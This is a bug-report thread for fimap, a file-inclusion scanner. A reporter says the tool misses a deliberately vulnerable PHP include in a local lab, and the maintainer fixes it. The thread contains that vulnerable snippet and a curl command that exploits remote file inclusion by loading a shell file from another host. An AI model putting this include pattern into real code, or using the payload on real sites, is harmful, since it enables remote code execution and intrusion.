search

alfredleo / fimap

Automatically exported from code.google.com/p/fimap
0 stars 1 forks source link

fimap does not detect vulnerabilities #81

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago 
On which URL this error occures? (Important!)

Tested URL: http://127.0.0.1/vulnerable.php?COLOR=red

vulnerable.php contents:

<?php
   if ( isset( $_GET['COLOR'] ) ) {
      include( $_GET['COLOR'] . '.php' );
   }
?>
<form method="get">
   <select name="COLOR">
      <option value="red">red</option>
      <option value="blue">blue</option>
   </select>
   <input type="submit">
</form>

Which version of fimap you are using? (You can see that in the very first
line)

v.1.00_svn

On what operating system?

Kali Linux

Please provide any additional information below.

php.ini has the following set and testing the vulnerable code manually works:

allow_url_include = On

For any URL tested, the results are always the same:

SingleScan is testing URL: 'http://127.0.0.1/vulnerable.php?COLOR=red'
[14:21:07] [OUT] Inspecting URL 'http://127.0.0.1/vulnerable.php?COLOR=red'...
[14:21:07] [INFO] Fiddling around with URL...
Target URL isn't affected by any file inclusion bug :(

Original issue reported on code.google.com by doo...@kali.org on 24 Mar 2015 at 4:17

GoogleCodeExporter commented 9 years ago 
Hi,

Does this resolve your issue?
https://code.google.com/p/fimap/wiki/BlindMode

If not please leave another comment and I will check it more deeply.

-imax.

Original comment by fimap....@gmail.com on 24 Mar 2015 at 5:58

GoogleCodeExporter commented 9 years ago 
Thanks for the reply. Unfortunately, It's still not behaving properly and I've 
pasted the output below for fimap and doing it manually with curl.

root@kali:~/fimap/src# ./fimap.py -u 
"http://127.0.0.1/vulnerable.php?COLOR=red" -b
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

Blind FI-error checking enabled.
SingleScan is testing URL: 'http://127.0.0.1/vulnerable.php?COLOR=red'
[11:30:43] [OUT] Inspecting URL 'http://127.0.0.1/vulnerable.php?COLOR=red'...
[11:30:43] [INFO] Fiddling around with URL...
[11:30:43] [INFO] Sniper failed. Going blind...
Target URL isn't affected by any file inclusion bug :(

root@kali:~/fimap/src# curl 
'http://127.0.0.1/vulnerable.php?COLOR=http://172.16.206.148/shell.txt?'
remote shell inside!
root@kali:~/fimap/src#

Thanks!
dookie

Original comment by doo...@kali.org on 25 Mar 2015 at 11:35

GoogleCodeExporter commented 9 years ago 
This issue was closed by revision r333.

Original comment by fimap....@gmail.com on 25 Mar 2015 at 3:15

GoogleCodeExporter commented 9 years ago 
Hi Dookie,

Thank you alot for your report!
I could reproduce this error and fix it.

Please checkout the newest version and let me know if this issue is history.

Again, Thank you alot for your time to report. :)
-imax

Original comment by fimap....@gmail.com on 25 Mar 2015 at 3:18

GoogleCodeExporter commented 9 years ago 
Tested and confirmed working. Thanks for the quick fix!

dookie

Original comment by doo...@kali.org on 25 Mar 2015 at 3:25